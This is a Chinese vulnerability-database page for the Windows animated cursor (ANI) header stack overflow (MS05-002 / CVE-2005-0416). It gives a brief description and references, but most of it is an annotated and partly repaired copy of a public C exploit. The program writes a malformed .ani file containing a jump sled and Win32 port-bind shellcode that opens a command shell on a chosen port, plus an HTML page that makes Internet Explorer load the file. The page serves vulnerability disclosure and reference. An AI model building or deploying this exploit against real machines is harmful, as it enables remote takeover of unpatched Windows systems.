Windows动画光标畸形ANI头结构溢出漏洞

Windows动画光标畸形ANI头结构溢出漏洞

漏洞ID 1108414 漏洞类型 缓冲区溢出
发布时间 2005-01-22 更新时间 2005-10-20
CVE编号 CVE-2005-0416
CNNVD-ID CNNVD-200504-105
漏洞平台 Windows CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/765
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200504-105
|漏洞详情
Microsoft Windows 是微软发布的很流行的操作系统。Windows NT、Windows 2000 through SP4、Windows XP through SP1 和 Windows 2003 中的 Windows Animated Cursor (ANI) 功能使得远程攻击者可以利用 AnimationHeaderBlock 长度字段导致栈缓冲区溢出，从而执行任意代码。
|漏洞EXP
/* Added string.h /str0ke */
/* HOD-ms05002-ani-expl.c: 2005-01-10: PUBLIC v.0.2
 *
 * Copyright (c) 2004-2005 houseofdabus.
 *
 * (MS05-002) Microsoft Internet Explorer .ANI Files Handling Exploit
 * (CAN-2004-1049 is the ID the author pairs with MS05-002; this page files the
 *  ANI-header overflow under CVE-2005-0416, whose references -- BID 12233,
 *  XF 18879, eEye AD20050111 -- are the ones listed below. Confirm which ID
 *  you cite against those sources.)
 *
 *
 *
 *                 .::[ houseofdabus ]::.
 *
 *
 *
 * (universal -- for all affected systems)
 * ---------------------------------------------------------------------
 * Description:
 *    A remote code execution vulnerability exists in the way that
 *    cursor, animated cursor, and icon formats are handled. An attacker
 *    could try to exploit the vulnerability by constructing a malicious
 *    cursor or icon file that could potentially allow remote code
 *    execution if a user visited a malicious Web site or viewed a
 *    malicious e-mail message. An attacker who successfully exploited
 *    this vulnerability could take complete control of an affected
 *    system.
 *
 * ---------------------------------------------------------------------
 * Patch:
 *    http://www.microsoft.com/technet/security/Bulletin/MS05-002.mspx
 *
 * ---------------------------------------------------------------------
 * Tested on:
 *    - Windows Server 2003
 *    - Windows XP SP1
 *    - Windows XP SP0
 *    - Windows 2000 SP4
 *    - Windows 2000 SP3
 *    - Windows 2000 SP2
 *
 * ---------------------------------------------------------------------
 * Compile:
 *
 * Win32/VC++  : cl -o HOD-ms05002-ani-expl HOD-ms05002-ani-expl.c
 * Win32/cygwin: gcc -o HOD-ms05002-ani-expl HOD-ms05002-ani-expl.c
 * Linux       : gcc -o HOD-ms05002-ani-expl HOD-ms05002-ani-expl.c
 *
 * ---------------------------------------------------------------------
 * Example:
 *
 * C:\>HOD-ms05002-ani-expl.exe poc 7777
 * <...>
 * [*] Creating poc.ani file ... Ok
 * [*] Creating poc.html file ... Ok
 *
 * C:\>
 *
 * start IE -> C:\poc.html
 *
 * C:\>telnet localhost 7777
 * Microsoft Windows 2000 [Version 5.00.2195]
 * (C) Copyright 1985-2000 Microsoft Corp.
 *
 * C:\Documents and Settings\Administrator\Desktop>
 *
 * ---------------------------------------------------------------------
 *
 *   This is provided as proof-of-concept code only for educational
 *   purposes and testing by authorized individuals with permission to
 *   do so.
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* ANI header */
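/* Prefix of the generated .ani file: a RIFF/ACON container whose "anih"
 * chunk declares a length far larger than the 36-byte ANIHEADER it should
 * describe.  That oversized AnimationHeaderBlock length field is the trigger
 * described on this page; the bytes that follow the real header are what the
 * vulnerable parser copies over its stack frame.
 *
 * The original listing had lost every backslash ("x52x49..."); the \x escapes
 * are restored here so the literal again holds the intended bytes. */
unsigned char aniheader[] =
/* "RIFF", RIFF size 0x189c, "ACON", "anih" */
"\x52\x49\x46\x46\x9c\x18\x00\x00\x41\x43\x4f\x4e\x61\x6e\x69\x68"
/* anih chunk length 0x37c (892) instead of 36; then cbSize=36, nFrames=8, nSteps=8 */
"\x7c\x03\x00\x00\x24\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

/* jmp offset, no Jitsu -- \xeb\xNN are short forward jumps interleaved with a
 * repeated dword 0x00408277 (presumably the value meant to land in the
 * overwritten return address; the listing does not say what it points to),
 * followed by 0x90 (x86 NOP) filler up to the shellcode. */
"\x77\x82\x40\x00\xeb\x64\x90\x90\x77\x82\x40\x00\xeb\x64\x90\x90"
"\xeb\x54\x90\x90\x77\x82\x40\x00\xeb\x54\x90\x90\x77\x82\x40\x00"
"\xeb\x44\x90\x90\x77\x82\x40\x00\xeb\x44\x90\x90\x77\x82\x40\x00"
"\xeb\x34\x90\x90\x77\x82\x40\x00\xeb\x34\x90\x90\x77\x82\x40\x00"
"\xeb\x24\x90\x90\x77\x82\x40\x00\xeb\x24\x90\x90\x77\x82\x40\x00"
"\xeb\x14\x90\x90\x77\x82\x40\x00\xeb\x14\x90\x90\x77\x82\x40\x00"
"\x77\x82\x40\x00\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";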


/* portbind shellcode */
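/* Win32 port-bind payload, 404 bytes.  The embedded strings "ws2_32" and
 * "cmd" show it loads Winsock and spawns a shell on a listening socket.
 * Bytes 300-301 hold the listen port in network byte order (0x115c = 4444 as
 * shipped); main() overwrites them through SET_PORTBIND_PORT().
 *
 * The original listing had lost every backslash; the \x escapes are restored
 * so the literal holds the intended bytes rather than ASCII "xeb...". */
unsigned char shellcode[] =
"\xeb\x70\x56\x33\xc0\x64\x8b\x40\x30\x85\xc0\x78\x0c\x8b\x40\x0c"
"\x8b\x70\x1c\xad\x8b\x40\x08\xeb\x09\x8b\x40\x34\x8d\x40\x7c\x8b"
"\x40\x3c\x5e\xc3\x60\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54\x05\x78"
"\x03\xd5\x8b\x4a\x18\x8b\x5a\x20\x03\xdd\xe3\x34\x49\x8b\x34\x8b"
"\x03\xf5\x33\xff\x33\xc0\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x03"
"\xf8\xeb\xf4\x3b\x7c\x24\x28\x75\xe1\x8b\x5a\x24\x03\xdd\x66\x8b"
"\x0c\x4b\x8b\x5a\x1c\x03\xdd\x8b\x04\x8b\x03\xc5\x89\x44\x24\x1c"
"\x61\xc3\xeb\x3d\xad\x50\x52\xe8\xa8\xff\xff\xff\x89\x07\x83\xc4"
"\x08\x83\xc7\x04\x3b\xf1\x75\xec\xc3\x8e\x4e\x0e\xec\x72\xfe\xb3"
"\x16\x7e\xd8\xe2\x73\xad\xd9\x05\xce\xd9\x09\xf5\xad\xa4\x1a\x70"
"\xc7\xa4\xad\x2e\xe9\xe5\x49\x86\x49\xcb\xed\xfc\x3b\xe7\x79\xc6"
"\x79\x83\xec\x60\x8b\xec\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x5e"
"\xe8\x3d\xff\xff\xff\x8b\xd0\x83\xee\x36\x8d\x7d\x04\x8b\xce\x83"
"\xc1\x10\xe8\x9d\xff\xff\xff\x83\xc1\x18\x33\xc0\x66\xb8\x33\x32"
"\x50\x68\x77\x73\x32\x5f\x8b\xdc\x51\x52\x53\xff\x55\x04\x5a\x59"
"\x8b\xd0\xe8\x7d\xff\xff\xff\xb8\x01\x63\x6d\x64\xc1\xf8\x08\x50"
"\x89\x65\x34\x33\xc0\x66\xb8\x90\x01\x2b\xe0\x54\x83\xc0\x72\x50"
"\xff\x55\x24\x33\xc0\x50\x50\x50\x50\x40\x50\x40\x50\xff\x55\x14"
/* sockaddr_in build: the two bytes after \xb8\x02\x01 (offset 300) are the port */
"\x8b\xf0\x33\xc0\x33\xdb\x50\x50\x50\xb8\x02\x01\x11\x5c\xfe\xcc"
"\x50\x8b\xc4\xb3\x10\x53\x50\x56\xff\x55\x18\x53\x56\xff\x55\x1c"
"\x53\x8b\xd4\x2b\xe3\x8b\xcc\x52\x51\x56\xff\x55\x20\x8b\xf0\x33"
"\xc9\xb1\x54\x2b\xe1\x8b\xfc\x57\x33\xc0\xf3\xaa\x5f\xc6\x07\x44"
"\xfe\x47\x2d\x57\x8b\xc6\x8d\x7f\x38\xab\xab\xab\x5f\x33\xc0\x8d"
"\x77\x44\x56\x57\x50\x50\x50\x40\x50\x48\x50\x50\xff\x75\x34\x50"
"\xff\x55\x08\xf7\xd0\x50\xff\x36\xff\x55\x10\xff\x77\x38\xff\x55"
"\x28\xff\x55\x0c";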

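/* Patch the listening port into the portbind shellcode.  Offset 300 holds the
 * two port bytes of the sockaddr_in the payload builds; the caller must pass
 * the value already in network byte order (main() goes through fixx()).
 * memcpy replaces the original unaligned, type-punned unsigned-short store
 * through a cast pointer; the bytes written are identical. */
#define SET_PORTBIND_PORT(buf, port) \
	do { \
		unsigned short port_be_ = (port); \
		memcpy((buf) + 300, &port_be_, sizeof port_be_); \
	} while (0)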

/* Disclaimer line: printed by main() at startup and also substituted into the
 * generated HTML page's alert() call. */
unsigned char discl[] =
	"This is provided as proof-of-concept code only for"
	" educational purposes and testing by authorized"
	" individuals with permission to do so.";

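/* Template for the generated HTML page.  Two %s slots, filled in this order
 * by main(): the disclaimer text shown via alert(), then the base filename,
 * which the CSS rule expands to "<name>.ani" so the browser loads the cursor.
 *
 * The original listing had lost its backslashes (broken \" and \n/\t escapes,
 * which left the literal unterminated); they are restored here. */
unsigned char html[] =
"<html>\n"
"(MS05-002) Microsoft Internet Explorer .ANI Files Handling Exploit"
"<br>Copyright (c) 2004-2005 .: houseofdabus :.<br><a href =\""
"http://www.microsoft.com/technet/security/Bulletin/MS05-002.mspx\">"
"Patch (MS05-002)</a>\n"
"<script>alert(\"%s\")</script>\n<head>\n\t<style>\n"
"\t\t* {CURSOR: url(\"%s.ani\")}\n\t</style>\n</head>\n"
"</html>";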


/* Swap the two bytes of a 16-bit value.  main() uses it to turn the
 * user-supplied port into the byte order the shellcode stores it in.
 * p: value to swap.  Returns p with its high and low bytes exchanged. */
unsigned short
fixx(unsigned short p)
{
	unsigned int hi = (p >> 8) & 0xFFu;
	unsigned int lo = p & 0xFFu;

	return (unsigned short)((lo << 8) | hi);
}

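/* Print the command-line synopsis and terminate.  Never returns.
 * prog: argv[0], echoed in the synopsis.
 * Restores the "\n" escapes the listing had lost, and exits with status 1
 * (it is only reached on a usage error, so a success status was misleading). */
void
usage(char *prog)
{
	printf("Usage:\n");
	printf("%s <file> <bindport>\n\n", prog);
	exit(1);
}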


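/* Sizes the generator is built around. */
enum {
	ANI_FILE_SIZE = 912,	/* bytes written to <file>.ani */
	NAME_MAX_LEN  = 256,	/* longest accepted base filename */
	PORT_MIN      = 1,
	PORT_MAX      = 65535
};

/* Parse a decimal TCP port.  Returns 0 on any error (0 is never accepted as a
 * bind port here).  Replaces atoi(), which silently accepted garbage. */
static unsigned short
parse_port(const char *s)
{
	char *end = NULL;
	long v = strtol(s, &end, 10);

	if (end == s || *end != '\0' || v < PORT_MIN || v > PORT_MAX)
		return 0;
	return (unsigned short)v;
}

/* Create path and write len bytes to it.  Returns 0 on success, -1 on any
 * failure (open, short write, or the flushing fclose). */
static int
write_file(const char *path, const unsigned char *data, size_t len)
{
	FILE *fp = fopen(path, "wb");

	if (fp == NULL)
		return -1;
	if (fwrite(data, 1, len, fp) != len) {
		fclose(fp);
		return -1;
	}
	return fclose(fp) == 0 ? 0 : -1;
}

/* Generate <file>.ani (header + port-patched shellcode, NOP-filled to 912
 * bytes) and <file>.html (a page whose CSS cursor rule loads that .ani).
 * argv[1] is the base filename, argv[2] the decimal port the payload listens
 * on.  Returns 0 on success, 1 on any error.
 *
 * Fixes relative to the listing: the string escapes lost in extraction are
 * restored; the filename buffer was f[256+5], one byte short of holding a
 * 256-character name plus ".html" plus NUL, so the size is derived from the
 * longer suffix and all builds go through snprintf(); the port is validated
 * instead of atoi()'d; fwrite()/fclose() results are checked; the "must be
 * <= 686" message is computed from the real limit. */
int
main(int argc, char **argv)
{
	char f[NAME_MAX_LEN + sizeof ".html"];
	unsigned char anib[ANI_FILE_SIZE];
	unsigned short port;
	size_t hdr_len = sizeof(aniheader) - 1;
	size_t sc_len = sizeof(shellcode) - 1;
	size_t sc_max = ANI_FILE_SIZE - hdr_len - 3;
	int n;

	printf("\n(MS05-002) Microsoft Internet Explorer .ANI Files Handling Exploit\n\n");
	printf("\tCopyright (c) 2004-2005 .: houseofdabus :.\n\n\n");
	printf("Tested on all affected systems:\n");
	printf("   [+] Windows Server 2003\n   [+] Windows XP SP1, SP0\n");
	printf("   [+] Windows 2000 All SP\n\n");

	printf("%s\n\n", (const char *)discl);

	/* The payload has to fit in the fixed-size file after the header. */
	if (sc_len > sc_max) {
		printf("[-] Size of shellcode must be <= %zu bytes\n", sc_max);
		return 1;
	}
	if (argc < 3)
		usage(argv[0]);

	if (strlen(argv[1]) > NAME_MAX_LEN) {
		printf("[-] Size of filename must be <=256 bytes\n");
		return 1;
	}
	port = parse_port(argv[2]);
	if (port == 0) {
		printf("[-] bindport must be a number between 1 and 65535\n");
		return 1;
	}

	/* --- <file>.ani: header, shellcode, 0x90 filler to 912 bytes --- */
	snprintf(f, sizeof f, "%s.ani", argv[1]);
	printf("[*] Creating %s file ...", f);
	memset(anib, 0x90, sizeof anib);
	memcpy(anib, aniheader, hdr_len);
	SET_PORTBIND_PORT(shellcode, fixx(port));	/* port in network byte order */
	memcpy(anib + hdr_len, shellcode, sc_len);
	if (write_file(f, anib, sizeof anib) != 0) {
		printf("\n[-] error: can't create file: %s\n", f);
		return 1;
	}
	printf(" Ok\n");

	/* --- <file>.html: page referencing <file>.ani as a CSS cursor --- */
	snprintf(f, sizeof f, "%s.html", argv[1]);
	printf("[*] Creating %s file ...", f);
	/* html is a constant template defined in this file, not user input; the
	 * two %s slots take the disclaimer and the (length-checked) base name. */
	n = snprintf((char *)anib, sizeof anib, (const char *)html, discl, argv[1]);
	if (n < 0 || (size_t)n >= sizeof anib) {
		printf("\n[-] error: html page does not fit the buffer\n");
		return 1;
	}
	if (write_file(f, anib, (size_t)n) != 0) {
		printf("\n[-] error: can't create file: %s\n", f);
		return 1;
	}
	printf(" Ok\n");

	return 0;
}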

// milw0rm.com [2005-01-22]
|参考资料

来源:XF
名称:win-user32-aniheader-overflow(18879)
链接:http://xforce.iss.net/xforce/xfdb/18879
来源:BID
名称:12233
链接:http://www.securityfocus.com/bid/12233
来源:MS
名称:MS05-002
链接:http://www.microsoft.com/technet/Security/bulletin/ms05-002.mspx
来源:MISC
链接:http://eeye.com/html/research/advisories/AD20050111.html
来源:BUGTRAQ
名称:20050112 Windows ANI File Parsing Proof Of Concept (MS05-002)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=110556975827760&w=2
来源:BUGTRAQ
名称:20050111 EEYE: Windows ANI File Parsing Buffer Overflow
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=110547079218397&w=2
